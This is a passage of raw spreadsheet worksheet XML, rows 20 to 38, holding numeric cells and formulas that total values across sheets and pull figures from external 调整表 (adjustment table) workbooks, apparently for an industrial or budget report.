      <c r="I20" s="194">
        <f>H20+yc!I20</f>
        <v>0</v>
      </c>
      <c r="J20" s="194">
        <f>J30+J40+J50+J60</f>
        <v>0</v>
      </c>
      <c r="K20" s="194">
        <f>J20+'31'!K20</f>
        <v>0</v>
      </c>
      <c r="L20" s="194">
        <f>K20+yc!L20</f>
        <v>0</v>
      </c>
      <c r="M20" s="194"/>
      <c r="N20" s="195"/>
      <c r="O20" s="199"/>
      <c r="P20" s="215"/>
      <c r="Q20" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R20" s="209">
        <f>[13]调整表!$W$73</f>
        <v>3.90195409541849</v>
      </c>
      <c r="S20" s="209">
        <f>[13]调整表!$X$73</f>
        <v>215.814136815871</v>
      </c>
      <c r="T20" s="209">
        <f>[13]调整表!$Y$73</f>
        <v>238.207962772632</v>
      </c>
      <c r="U20" s="209">
        <f>[13]调整表!$T$73</f>
        <v>0</v>
      </c>
      <c r="V20" s="209">
        <f>[13]调整表!$U$73</f>
        <v>0.632539111021361</v>
      </c>
      <c r="W20" s="209">
        <f>[13]调整表!$V$73</f>
        <v>11.5260803908151</v>
      </c>
      <c r="X20" s="209">
        <f>[13]调整表!$Q$73</f>
        <v>0</v>
      </c>
      <c r="Y20" s="209">
        <f>[13]调整表!$R$73</f>
        <v>281.910031</v>
      </c>
      <c r="Z20" s="209">
        <f>[13]调整表!$S$73</f>
        <v>6063.640372</v>
      </c>
    </row>
    <row r="21" ht="15.75" customHeight="1" spans="1:26">
      <c r="A21" s="191" t="s">
        <v>229</v>
      </c>
      <c r="B21" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C21" s="193"/>
      <c r="D21" s="193"/>
      <c r="E21" s="194">
        <v>190000</v>
      </c>
      <c r="F21" s="194">
        <f>[10]调整表!$D$22</f>
        <v>83053.31</v>
      </c>
      <c r="G21" s="194">
        <f>[10]调整表!$E$22</f>
        <v>-2.91038304567337e-11</v>
      </c>
      <c r="H21" s="194">
        <f>G21+'31'!H21</f>
        <v>215822</v>
      </c>
      <c r="I21" s="194">
        <f>H21+yc!I21</f>
        <v>2325260</v>
      </c>
      <c r="J21" s="194">
        <f>[10]调整表!$I$22</f>
        <v>0</v>
      </c>
      <c r="K21" s="194">
        <f>J21+'31'!K21</f>
        <v>248980.17</v>
      </c>
      <c r="L21" s="194">
        <f>K21+yc!L21</f>
        <v>2315434.17</v>
      </c>
      <c r="M21" s="194">
        <f>[10]调整表!$L$22</f>
        <v>49895.14</v>
      </c>
      <c r="N21" s="195">
        <f>M21/47000*100</f>
        <v>106.159872340426</v>
      </c>
      <c r="O21" s="199"/>
      <c r="P21" s="215"/>
      <c r="Q21" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R21" s="209">
        <f>[13]调整表!$W$81</f>
        <v>1.91291761382655</v>
      </c>
      <c r="S21" s="209">
        <f>[13]调整表!$X$81</f>
        <v>279.272756232641</v>
      </c>
      <c r="T21" s="209">
        <f>[13]调整表!$Y$81</f>
        <v>275.967336048003</v>
      </c>
      <c r="U21" s="209">
        <f>[13]调整表!$T$81</f>
        <v>0</v>
      </c>
      <c r="V21" s="209">
        <f>[13]调整表!$U$81</f>
        <v>0.563477906420152</v>
      </c>
      <c r="W21" s="209">
        <f>[13]调整表!$V$81</f>
        <v>5.98177875354826</v>
      </c>
      <c r="X21" s="209">
        <f>[13]调整表!$Q$81</f>
        <v>0</v>
      </c>
      <c r="Y21" s="209">
        <f>[13]调整表!$R$81</f>
        <v>251.130833333333</v>
      </c>
      <c r="Z21" s="209">
        <f>[13]调整表!$S$81</f>
        <v>3146.89416666667</v>
      </c>
    </row>
    <row r="22" ht="15.75" customHeight="1" spans="1:26">
      <c r="A22" s="191"/>
      <c r="B22" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C22" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D22" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E22" s="194">
        <v>163000</v>
      </c>
      <c r="F22" s="194">
        <f>[10]调整表!$D$17</f>
        <v>189966.352</v>
      </c>
      <c r="G22" s="194">
        <f>[10]调整表!$E$17</f>
        <v>0</v>
      </c>
      <c r="H22" s="194">
        <f>G22+'31'!H22</f>
        <v>62660</v>
      </c>
      <c r="I22" s="194">
        <f>H22+yc!I22</f>
        <v>2093641</v>
      </c>
      <c r="J22" s="194">
        <f>[10]调整表!$I$17</f>
        <v>262</v>
      </c>
      <c r="K22" s="194">
        <f>J22+'31'!K22</f>
        <v>207350.91</v>
      </c>
      <c r="L22" s="194">
        <f>K22+yc!L22</f>
        <v>2098812.29</v>
      </c>
      <c r="M22" s="194">
        <f>[10]调整表!$L$17</f>
        <v>45275.442</v>
      </c>
      <c r="N22" s="216">
        <f>(M22+M23)/(50000+150000)*100</f>
        <v>22.637721</v>
      </c>
      <c r="O22" s="199"/>
      <c r="P22" s="215"/>
      <c r="Q22" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R22" s="209">
        <f>[13]调整表!$W$79</f>
        <v>0</v>
      </c>
      <c r="S22" s="209">
        <f>[13]调整表!$X$79</f>
        <v>102.48793507571</v>
      </c>
      <c r="T22" s="209">
        <f>[13]调整表!$Y$79</f>
        <v>102.280788161952</v>
      </c>
      <c r="U22" s="209">
        <f>[13]调整表!$T$79</f>
        <v>0</v>
      </c>
      <c r="V22" s="209">
        <f>[13]调整表!$U$79</f>
        <v>0.816606708350785</v>
      </c>
      <c r="W22" s="209">
        <f>[13]调整表!$V$79</f>
        <v>15.2125310472425</v>
      </c>
      <c r="X22" s="209">
        <f>[13]调整表!$Q$79</f>
        <v>0</v>
      </c>
      <c r="Y22" s="209">
        <f>[13]调整表!$R$79</f>
        <v>363.945277777778</v>
      </c>
      <c r="Z22" s="209">
        <f>[13]调整表!$S$79</f>
        <v>4001.50416666667</v>
      </c>
    </row>
    <row r="23" ht="15.75" customHeight="1" spans="1:26">
      <c r="A23" s="191"/>
      <c r="B23" s="193"/>
      <c r="C23" s="193"/>
      <c r="D23" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E23" s="194"/>
      <c r="F23" s="194">
        <f>[10]调整表!$D$20</f>
        <v>0</v>
      </c>
      <c r="G23" s="194">
        <f>[10]调整表!$E$20</f>
        <v>0</v>
      </c>
      <c r="H23" s="194">
        <f>G23+'31'!H23</f>
        <v>0</v>
      </c>
      <c r="I23" s="194">
        <f>H23+yc!I23</f>
        <v>0</v>
      </c>
      <c r="J23" s="194">
        <f>[10]调整表!$I$20</f>
        <v>0</v>
      </c>
      <c r="K23" s="194">
        <f>J23+'31'!K23</f>
        <v>0</v>
      </c>
      <c r="L23" s="194">
        <f>K23+yc!L23</f>
        <v>0</v>
      </c>
      <c r="M23" s="194">
        <f>[10]调整表!$L$20</f>
        <v>0</v>
      </c>
      <c r="N23" s="217"/>
      <c r="O23" s="199"/>
      <c r="P23" s="214"/>
      <c r="Q23" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R23" s="209">
        <f>[13]调整表!$W$80</f>
        <v>0</v>
      </c>
      <c r="S23" s="209">
        <f>[13]调整表!$X$80</f>
        <v>83.9937383329559</v>
      </c>
      <c r="T23" s="209">
        <f>[13]调整表!$Y$80</f>
        <v>79.5974862641465</v>
      </c>
      <c r="U23" s="209">
        <f>[13]调整表!$T$80</f>
        <v>0</v>
      </c>
      <c r="V23" s="209">
        <f>[13]调整表!$U$80</f>
        <v>0.624693975747422</v>
      </c>
      <c r="W23" s="209">
        <f>[13]调整表!$V$80</f>
        <v>5.4806672833874</v>
      </c>
      <c r="X23" s="209">
        <f>[13]调整表!$Q$80</f>
        <v>0</v>
      </c>
      <c r="Y23" s="209">
        <f>[13]调整表!$R$80</f>
        <v>278.413611111111</v>
      </c>
      <c r="Z23" s="209">
        <f>[13]调整表!$S$80</f>
        <v>2883.26944444445</v>
      </c>
    </row>
    <row r="24" ht="15.75" customHeight="1" spans="1:26">
      <c r="A24" s="191"/>
      <c r="B24" s="193"/>
      <c r="C24" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D24" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E24" s="194"/>
      <c r="F24" s="194">
        <f>[10]调整表!$D$21</f>
        <v>0</v>
      </c>
      <c r="G24" s="194">
        <f>[10]调整表!$E$56</f>
        <v>0</v>
      </c>
      <c r="H24" s="194">
        <f>G24+'31'!H24</f>
        <v>0</v>
      </c>
      <c r="I24" s="194">
        <f>H24+yc!I24</f>
        <v>0</v>
      </c>
      <c r="J24" s="194">
        <f>[10]调整表!$I$56</f>
        <v>0</v>
      </c>
      <c r="K24" s="194">
        <f>J24+'31'!K24</f>
        <v>47084.13</v>
      </c>
      <c r="L24" s="194">
        <f>K24+yc!L24</f>
        <v>326910.66</v>
      </c>
      <c r="M24" s="194">
        <f>[10]调整表!$L$21</f>
        <v>0</v>
      </c>
      <c r="N24" s="195"/>
      <c r="O24" s="199"/>
      <c r="P24" s="218" t="s">
        <v>262</v>
      </c>
      <c r="Q24" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R24" s="209">
        <f>[14]调整表!$R$6</f>
        <v>0</v>
      </c>
      <c r="S24" s="209">
        <f>[14]调整表!$S$6</f>
        <v>84.01</v>
      </c>
      <c r="T24" s="209">
        <f>[14]调整表!$T$6</f>
        <v>86.25</v>
      </c>
      <c r="U24" s="209">
        <f>[14]调整表!$O$6</f>
        <v>0</v>
      </c>
      <c r="V24" s="209">
        <f>[14]调整表!$P$6</f>
        <v>63.2836021505376</v>
      </c>
      <c r="W24" s="209">
        <f>[14]调整表!$Q$6</f>
        <v>53.2505707762557</v>
      </c>
      <c r="X24" s="209">
        <f>[14]调整表!$L$6</f>
        <v>0</v>
      </c>
      <c r="Y24" s="209">
        <f>[14]调整表!$M$6</f>
        <v>470.83</v>
      </c>
      <c r="Z24" s="209">
        <f>[14]调整表!$N$6</f>
        <v>4664.75</v>
      </c>
    </row>
    <row r="25" ht="15.75" customHeight="1" spans="1:26">
      <c r="A25" s="191"/>
      <c r="B25" s="193"/>
      <c r="C25" s="193"/>
      <c r="D25" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E25" s="194"/>
      <c r="F25" s="194"/>
      <c r="G25" s="194">
        <f>[10]调整表!$E$69</f>
        <v>0</v>
      </c>
      <c r="H25" s="194">
        <f>G25+'31'!H25</f>
        <v>0</v>
      </c>
      <c r="I25" s="194">
        <f>H25+yc!I25</f>
        <v>0</v>
      </c>
      <c r="J25" s="194">
        <f>[10]调整表!$I$69</f>
        <v>0</v>
      </c>
      <c r="K25" s="194">
        <f>J25+'31'!K25</f>
        <v>473.78</v>
      </c>
      <c r="L25" s="194">
        <f>K25+yc!L25</f>
        <v>79794.63</v>
      </c>
      <c r="M25" s="194"/>
      <c r="N25" s="195"/>
      <c r="O25" s="199"/>
      <c r="P25" s="219"/>
      <c r="Q25" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R25" s="209">
        <f>[14]调整表!$R$7</f>
        <v>0</v>
      </c>
      <c r="S25" s="209">
        <f>[14]调整表!$S$7</f>
        <v>187.879339783722</v>
      </c>
      <c r="T25" s="209">
        <f>[14]调整表!$T$7</f>
        <v>187.69</v>
      </c>
      <c r="U25" s="209">
        <f>[14]调整表!$O$7</f>
        <v>0</v>
      </c>
      <c r="V25" s="209">
        <f>[14]调整表!$P$7</f>
        <v>59.0389784946236</v>
      </c>
      <c r="W25" s="209">
        <f>[14]调整表!$Q$7</f>
        <v>50.9341324200913</v>
      </c>
      <c r="X25" s="209">
        <f>[14]调整表!$L$7</f>
        <v>0</v>
      </c>
      <c r="Y25" s="209">
        <f>[14]调整表!$M$7</f>
        <v>439.25</v>
      </c>
      <c r="Z25" s="209">
        <f>[14]调整表!$N$7</f>
        <v>4461.83</v>
      </c>
    </row>
    <row r="26" ht="15.75" customHeight="1" spans="1:26">
      <c r="A26" s="191"/>
      <c r="B26" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C26" s="193"/>
      <c r="D26" s="193"/>
      <c r="E26" s="194"/>
      <c r="F26" s="194"/>
      <c r="G26" s="194"/>
      <c r="H26" s="194">
        <f>G26+'31'!H26</f>
        <v>0</v>
      </c>
      <c r="I26" s="194">
        <f>H26+yc!I26</f>
        <v>0</v>
      </c>
      <c r="J26" s="194">
        <f>J27+J30</f>
        <v>0</v>
      </c>
      <c r="K26" s="194">
        <f>J26+'31'!K26</f>
        <v>0</v>
      </c>
      <c r="L26" s="194">
        <f>K26+yc!L26</f>
        <v>0</v>
      </c>
      <c r="M26" s="194"/>
      <c r="N26" s="195"/>
      <c r="O26" s="199"/>
      <c r="P26" s="191" t="s">
        <v>263</v>
      </c>
      <c r="Q26" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R26" s="209">
        <f>[15]调整表!$I$38</f>
        <v>0</v>
      </c>
      <c r="S26" s="209">
        <f>[15]调整表!$J$38</f>
        <v>0</v>
      </c>
      <c r="T26" s="209">
        <f>[15]调整表!$K$38</f>
        <v>0</v>
      </c>
      <c r="U26" s="209">
        <f>[15]调整表!$F$38</f>
        <v>0</v>
      </c>
      <c r="V26" s="209">
        <f>[15]调整表!$G$38</f>
        <v>0</v>
      </c>
      <c r="W26" s="209">
        <f>[15]调整表!$H$38</f>
        <v>0</v>
      </c>
      <c r="X26" s="209">
        <f>[15]调整表!$C$38</f>
        <v>0</v>
      </c>
      <c r="Y26" s="209">
        <f>[15]调整表!$D$38</f>
        <v>0</v>
      </c>
      <c r="Z26" s="209">
        <f>[15]调整表!$E$38</f>
        <v>0</v>
      </c>
    </row>
    <row r="27" ht="15.75" customHeight="1" spans="1:26">
      <c r="A27" s="191"/>
      <c r="B27" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C27" s="193"/>
      <c r="D27" s="193"/>
      <c r="E27" s="194">
        <v>190000</v>
      </c>
      <c r="F27" s="194"/>
      <c r="G27" s="194"/>
      <c r="H27" s="194">
        <f>G27+'31'!H27</f>
        <v>0</v>
      </c>
      <c r="I27" s="194">
        <f>H27+yc!I27</f>
        <v>0</v>
      </c>
      <c r="J27" s="194">
        <f>SUM(J28:J29)</f>
        <v>0</v>
      </c>
      <c r="K27" s="194">
        <f>J27+'31'!K27</f>
        <v>0</v>
      </c>
      <c r="L27" s="194">
        <f>K27+yc!L27</f>
        <v>0</v>
      </c>
      <c r="M27" s="194"/>
      <c r="N27" s="195"/>
      <c r="O27" s="220" t="s">
        <v>264</v>
      </c>
      <c r="P27" s="191" t="s">
        <v>237</v>
      </c>
      <c r="Q27" s="191"/>
      <c r="R27" s="209">
        <f>[11]调整表!$W$69</f>
        <v>0</v>
      </c>
      <c r="S27" s="209">
        <f>[11]调整表!$X$69</f>
        <v>22.3202339065365</v>
      </c>
      <c r="T27" s="209">
        <f>[11]调整表!$Y$69</f>
        <v>25.1791608162718</v>
      </c>
      <c r="U27" s="221">
        <f>[11]调整表!$T$69</f>
        <v>0</v>
      </c>
      <c r="V27" s="209">
        <f>[11]调整表!$U$69</f>
        <v>51.2970430107527</v>
      </c>
      <c r="W27" s="209">
        <f>[11]调整表!$V$69</f>
        <v>66.9238584474886</v>
      </c>
      <c r="X27" s="209" t="str">
        <f>[11]调整表!$Q$69</f>
        <v>0.00</v>
      </c>
      <c r="Y27" s="209" t="str">
        <f>[11]调整表!$R$69</f>
        <v>381.65</v>
      </c>
      <c r="Z27" s="209" t="str">
        <f>[11]调整表!$S$69</f>
        <v>5862.53</v>
      </c>
    </row>
    <row r="28" ht="15.75" customHeight="1" spans="1:26">
      <c r="A28" s="191"/>
      <c r="B28" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C28" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D28" s="193"/>
      <c r="E28" s="194"/>
      <c r="F28" s="194"/>
      <c r="G28" s="194"/>
      <c r="H28" s="194">
        <f>G28+'31'!H28</f>
        <v>0</v>
      </c>
      <c r="I28" s="194">
        <f>H28+yc!I28</f>
        <v>0</v>
      </c>
      <c r="J28" s="194"/>
      <c r="K28" s="194">
        <f>J28+'31'!K28</f>
        <v>0</v>
      </c>
      <c r="L28" s="194">
        <f>K28+yc!L28</f>
        <v>0</v>
      </c>
      <c r="M28" s="194"/>
      <c r="N28" s="195"/>
      <c r="O28" s="222"/>
      <c r="P28" s="223" t="s">
        <v>306</v>
      </c>
      <c r="Q28" s="224"/>
      <c r="R28" s="209">
        <f>[10]调整表!$W$104</f>
        <v>0</v>
      </c>
      <c r="S28" s="209">
        <f>[10]调整表!$X$104</f>
        <v>28.2821576763485</v>
      </c>
      <c r="T28" s="209">
        <f>[10]调整表!$Y$104</f>
        <v>26.0475265697875</v>
      </c>
      <c r="U28" s="209">
        <f>[10]调整表!$T$104</f>
        <v>0</v>
      </c>
      <c r="V28" s="209">
        <f>[10]调整表!$U$104</f>
        <v>31.0439516129032</v>
      </c>
      <c r="W28" s="209">
        <f>[10]调整表!$V$104</f>
        <v>61.5412899543379</v>
      </c>
      <c r="X28" s="209">
        <f>[10]调整表!$Q$104</f>
        <v>0</v>
      </c>
      <c r="Y28" s="209">
        <f>[10]调整表!$R$104</f>
        <v>230.967</v>
      </c>
      <c r="Z28" s="209">
        <f>[10]调整表!$S$104</f>
        <v>5391.017</v>
      </c>
    </row>
    <row r="29" ht="15.75" customHeight="1" spans="1:26">
      <c r="A29" s="191"/>
      <c r="B29" s="191"/>
      <c r="C29" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D29" s="193"/>
      <c r="E29" s="194"/>
      <c r="F29" s="194"/>
      <c r="G29" s="194"/>
      <c r="H29" s="194">
        <f>G29+'31'!H29</f>
        <v>0</v>
      </c>
      <c r="I29" s="194">
        <f>H29+yc!I29</f>
        <v>0</v>
      </c>
      <c r="J29" s="194"/>
      <c r="K29" s="194">
        <f>J29+'31'!K29</f>
        <v>0</v>
      </c>
      <c r="L29" s="194">
        <f>K29+yc!L29</f>
        <v>0</v>
      </c>
      <c r="M29" s="225"/>
      <c r="N29" s="195"/>
      <c r="O29" s="222"/>
      <c r="P29" s="223" t="s">
        <v>307</v>
      </c>
      <c r="Q29" s="224"/>
      <c r="R29" s="209">
        <f>[10]调整表!$W$105</f>
        <v>0</v>
      </c>
      <c r="S29" s="209">
        <f>[10]调整表!$X$105</f>
        <v>0</v>
      </c>
      <c r="T29" s="209">
        <f>[10]调整表!$Y$105</f>
        <v>29.9342377123697</v>
      </c>
      <c r="U29" s="209">
        <f>[10]调整表!$T$105</f>
        <v>0</v>
      </c>
      <c r="V29" s="209">
        <f>[10]调整表!$U$105</f>
        <v>0</v>
      </c>
      <c r="W29" s="209">
        <f>[10]调整表!$V$105</f>
        <v>32.0112100456621</v>
      </c>
      <c r="X29" s="209">
        <f>[10]调整表!$Q$105</f>
        <v>0</v>
      </c>
      <c r="Y29" s="209">
        <f>[10]调整表!$R$105</f>
        <v>0</v>
      </c>
      <c r="Z29" s="209">
        <f>[10]调整表!$S$105</f>
        <v>2804.182</v>
      </c>
    </row>
    <row r="30" ht="15.75" customHeight="1" spans="1:26">
      <c r="A30" s="191"/>
      <c r="B30" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C30" s="193"/>
      <c r="D30" s="193"/>
      <c r="E30" s="194"/>
      <c r="F30" s="194"/>
      <c r="G30" s="194"/>
      <c r="H30" s="194">
        <f>G30+'31'!H30</f>
        <v>0</v>
      </c>
      <c r="I30" s="194">
        <f>H30+yc!I30</f>
        <v>0</v>
      </c>
      <c r="J30" s="194"/>
      <c r="K30" s="194">
        <f>J30+'31'!K30</f>
        <v>0</v>
      </c>
      <c r="L30" s="194">
        <f>K30+yc!L30</f>
        <v>0</v>
      </c>
      <c r="M30" s="225"/>
      <c r="N30" s="195"/>
      <c r="O30" s="222"/>
      <c r="P30" s="223" t="s">
        <v>252</v>
      </c>
      <c r="Q30" s="224"/>
      <c r="R30" s="209">
        <f>[12]调整表!$W$72</f>
        <v>0</v>
      </c>
      <c r="S30" s="226">
        <f>[12]调整表!$X$72</f>
        <v>0</v>
      </c>
      <c r="T30" s="209">
        <f>[12]调整表!$Y$72</f>
        <v>0</v>
      </c>
      <c r="U30" s="209">
        <f>[12]调整表!$T$72</f>
        <v>0</v>
      </c>
      <c r="V30" s="209">
        <f>[12]调整表!$U$72</f>
        <v>0</v>
      </c>
      <c r="W30" s="209">
        <f>[12]调整表!$V$72</f>
        <v>0</v>
      </c>
      <c r="X30" s="209">
        <f>[12]调整表!$Q$72</f>
        <v>0</v>
      </c>
      <c r="Y30" s="209">
        <f>[12]调整表!$R$72</f>
        <v>0</v>
      </c>
      <c r="Z30" s="209">
        <f>[12]调整表!$S$72</f>
        <v>0</v>
      </c>
    </row>
    <row r="31" ht="15.75" customHeight="1" spans="1:26">
      <c r="A31" s="191" t="s">
        <v>237</v>
      </c>
      <c r="B31" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C31" s="193"/>
      <c r="D31" s="193"/>
      <c r="E31" s="194">
        <v>150000</v>
      </c>
      <c r="F31" s="194">
        <f>[11]调整表!$D$16</f>
        <v>65429.37</v>
      </c>
      <c r="G31" s="194">
        <f>[11]调整表!$E$16</f>
        <v>3.63797880709171e-12</v>
      </c>
      <c r="H31" s="194">
        <f>G31+'31'!H31</f>
        <v>137253</v>
      </c>
      <c r="I31" s="194">
        <f>H31+yc!I31</f>
        <v>1510260</v>
      </c>
      <c r="J31" s="194">
        <f>[11]调整表!$I$16</f>
        <v>0</v>
      </c>
      <c r="K31" s="194">
        <f>J31+'31'!K31</f>
        <v>153523.14</v>
      </c>
      <c r="L31" s="194">
        <f>K31+yc!L31</f>
        <v>1509571.27</v>
      </c>
      <c r="M31" s="225">
        <f>[11]调整表!$L$16</f>
        <v>49159.23</v>
      </c>
      <c r="N31" s="195">
        <f>M31/75000*100</f>
        <v>65.54564</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[11]调整表!$D$13</f>
        <v>60437.506</v>
      </c>
      <c r="G32" s="194">
        <f>[11]调整表!$E$13</f>
        <v>500</v>
      </c>
      <c r="H32" s="194">
        <f>G32+'31'!H32</f>
        <v>103574</v>
      </c>
      <c r="I32" s="194">
        <f>H32+yc!I32</f>
        <v>1631417</v>
      </c>
      <c r="J32" s="194">
        <f>[11]调整表!$I$13</f>
        <v>364</v>
      </c>
      <c r="K32" s="194">
        <f>J32+'31'!K32</f>
        <v>101563</v>
      </c>
      <c r="L32" s="194">
        <f>K32+yc!L32</f>
        <v>1123041</v>
      </c>
      <c r="M32" s="225">
        <f>[11]调整表!$L$13</f>
        <v>36860.806</v>
      </c>
      <c r="N32" s="207">
        <f>(M32+M33)/50000*100</f>
        <v>73.721612</v>
      </c>
      <c r="O32" s="222"/>
      <c r="P32" s="223" t="s">
        <v>308</v>
      </c>
      <c r="Q32" s="224"/>
      <c r="R32" s="209">
        <f>[13]调整表!$W$76</f>
        <v>0</v>
      </c>
      <c r="S32" s="209">
        <f>[13]调整表!$X$76</f>
        <v>0</v>
      </c>
      <c r="T32" s="209">
        <f>[13]调整表!$Y$76</f>
        <v>0</v>
      </c>
      <c r="U32" s="209">
        <f>[13]调整表!$T$76</f>
        <v>0</v>
      </c>
      <c r="V32" s="209">
        <f>[13]调整表!$U$76</f>
        <v>6.73128702207862e-13</v>
      </c>
      <c r="W32" s="209">
        <f>[13]调整表!$V$76</f>
        <v>6.84306569343066e-12</v>
      </c>
      <c r="X32" s="209">
        <f>[13]调整表!$Q$76</f>
        <v>0</v>
      </c>
      <c r="Y32" s="209">
        <f>[13]调整表!$R$76</f>
        <v>3e-10</v>
      </c>
      <c r="Z32" s="209">
        <f>[13]调整表!$S$76</f>
        <v>3.6e-9</v>
      </c>
    </row>
    <row r="33" ht="15.75" customHeight="1" spans="1:26">
      <c r="A33" s="191"/>
      <c r="B33" s="193"/>
      <c r="C33" s="193"/>
      <c r="D33" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E33" s="194"/>
      <c r="F33" s="194"/>
      <c r="G33" s="194">
        <f>[11]调整表!$E$14</f>
        <v>0</v>
      </c>
      <c r="H33" s="194">
        <f>G33+'31'!H33</f>
        <v>0</v>
      </c>
      <c r="I33" s="194">
        <f>H33+yc!I33</f>
        <v>0</v>
      </c>
      <c r="J33" s="194">
        <f>[11]调整表!$I$14</f>
        <v>0</v>
      </c>
      <c r="K33" s="194">
        <f>J33+'31'!K33</f>
        <v>0</v>
      </c>
      <c r="L33" s="194">
        <f>K33+yc!L33</f>
        <v>0</v>
      </c>
      <c r="M33" s="225">
        <f>[11]调整表!$L$14</f>
        <v>0</v>
      </c>
      <c r="N33" s="212"/>
      <c r="O33" s="222"/>
      <c r="P33" s="223" t="s">
        <v>309</v>
      </c>
      <c r="Q33" s="224"/>
      <c r="R33" s="209">
        <f>[13]调整表!$W$77</f>
        <v>-0.0200000000000031</v>
      </c>
      <c r="S33" s="209">
        <f>[13]调整表!$X$77</f>
        <v>0</v>
      </c>
      <c r="T33" s="209">
        <f>[13]调整表!$Y$77</f>
        <v>0</v>
      </c>
      <c r="U33" s="209">
        <f>[13]调整表!$T$77</f>
        <v>0</v>
      </c>
      <c r="V33" s="209">
        <f>[13]调整表!$U$77</f>
        <v>0</v>
      </c>
      <c r="W33" s="209">
        <f>[13]调整表!$V$77</f>
        <v>9.61796684914863</v>
      </c>
      <c r="X33" s="209">
        <f>[13]调整表!$Q$77</f>
        <v>0</v>
      </c>
      <c r="Y33" s="209">
        <f>[13]调整表!$R$77</f>
        <v>0</v>
      </c>
      <c r="Z33" s="209">
        <f>[13]调整表!$S$77</f>
        <v>5059.82000000011</v>
      </c>
    </row>
    <row r="34" ht="15.75" customHeight="1" spans="1:26">
      <c r="A34" s="191"/>
      <c r="B34" s="193"/>
      <c r="C34" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D34" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E34" s="194"/>
      <c r="F34" s="194"/>
      <c r="G34" s="194">
        <f>[11]调整表!$E$50</f>
        <v>0</v>
      </c>
      <c r="H34" s="194">
        <f>G34+'31'!H34</f>
        <v>0</v>
      </c>
      <c r="I34" s="194">
        <f>H34+yc!I34</f>
        <v>0</v>
      </c>
      <c r="J34" s="194">
        <f>[11]调整表!$I$50</f>
        <v>0</v>
      </c>
      <c r="K34" s="194">
        <f>J34+'31'!K34</f>
        <v>25587.7</v>
      </c>
      <c r="L34" s="194">
        <f>K34+yc!L34</f>
        <v>492790.63</v>
      </c>
      <c r="M34" s="225">
        <f>[11]调整表!$L$15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[11]调整表!$E$64</f>
        <v>0</v>
      </c>
      <c r="H35" s="194">
        <f>G35+'31'!H35</f>
        <v>0</v>
      </c>
      <c r="I35" s="194">
        <f>H35+yc!I35</f>
        <v>0</v>
      </c>
      <c r="J35" s="194">
        <f>[11]调整表!$I$64</f>
        <v>0</v>
      </c>
      <c r="K35" s="194">
        <f>J35+'31'!K35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G36+'31'!H36</f>
        <v>0</v>
      </c>
      <c r="I36" s="194">
        <f>H36+yc!I36</f>
        <v>0</v>
      </c>
      <c r="J36" s="194">
        <f>J37+J40</f>
        <v>0</v>
      </c>
      <c r="K36" s="194">
        <f>J36+'31'!K36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G37+'31'!H37</f>
        <v>0</v>
      </c>
      <c r="I37" s="194">
        <f>H37+yc!I37</f>
        <v>0</v>
      </c>
      <c r="J37" s="194">
        <f>SUM(J38:J39)</f>
        <v>0</v>
      </c>
      <c r="K37" s="194">
        <f>J37+'31'!K37</f>
        <v>0</v>
      </c>
      <c r="L37" s="194">
        <f>K37+yc!L37</f>
        <v>0</v>
      </c>
      <c r="M37" s="225"/>
      <c r="N37" s="195"/>
      <c r="O37" s="197" t="s">
        <v>268</v>
      </c>
      <c r="P37" s="218" t="s">
        <v>229</v>
      </c>
      <c r="Q37" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R37" s="231">
        <f>[10]调整表!$P$7</f>
        <v>0</v>
      </c>
      <c r="S37" s="232">
        <f>[10]调整表!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T37" s="233">
        <f>[10]调整表!$R$7</f>
        <v>0</v>
      </c>
      <c r="U37" s="234">
        <f>T37+'31'!U37</f>
        <v>0</v>
      </c>
      <c r="V37" s="234">
        <f>U37+yc!V37</f>
        <v>0</v>
      </c>
      <c r="W37" s="235">
        <f>[10]调整表!$V$7</f>
        <v>0</v>
      </c>
      <c r="X37" s="234">
        <f>W37+'31'!X37</f>
        <v>0</v>
      </c>
      <c r="Y37" s="235">
        <f>X37+yc!Y37</f>
        <v>0</v>
      </c>
      <c r="Z37" s="235">
        <f>[10]调整表!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="38" ht="15.75" customHeight="1" spans="1:26">
      <c r="A38" s="191"/>
      <c r="B38" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C38" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D38" s="193"/>
      <c r="E38" s="194"/>
      <c r="F38" s="194"/>
      <c r="G38" s="225"/>
      <c r="H38" s="194">
        <f>G38+'31'!H38</f>
        <v>0</v>
      </c>
      <c r="I38" s="194">
        <f>H38+yc!I38</f>
        <v>0</v>
      </c>
      <c r="J38" s="194"/>
      <c r="K38" s="194">
        <f>J38+'31'!K38</f>
        <v>0</v>
      </c>
      <c r="L38" s="194">
        <f>K38+yc!L38</f>
        <v>0</v>
      </c>
      <c r="M38" s="194"/>
      <c r="N38" s="195"/>
      <c r="O38" s="200"/>
      <c r="P38" s="236"/>
      <c r="Q38" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R38" s="237">
        <f>[10]调整表!$P$10</f>
        <v>0</v>
      </c>
      <c r="S38" s="235">
        <f>[10]调整表!$Q$10</f>
        <v>9645.331</v>
      </c>
      <c r="T38" s="235">
        <f>[10]调整表!$R$10</f>
        <v>0</v>
      </c>
      <c r="U38" s="234">
        <f>T38+'31'!U38</f>
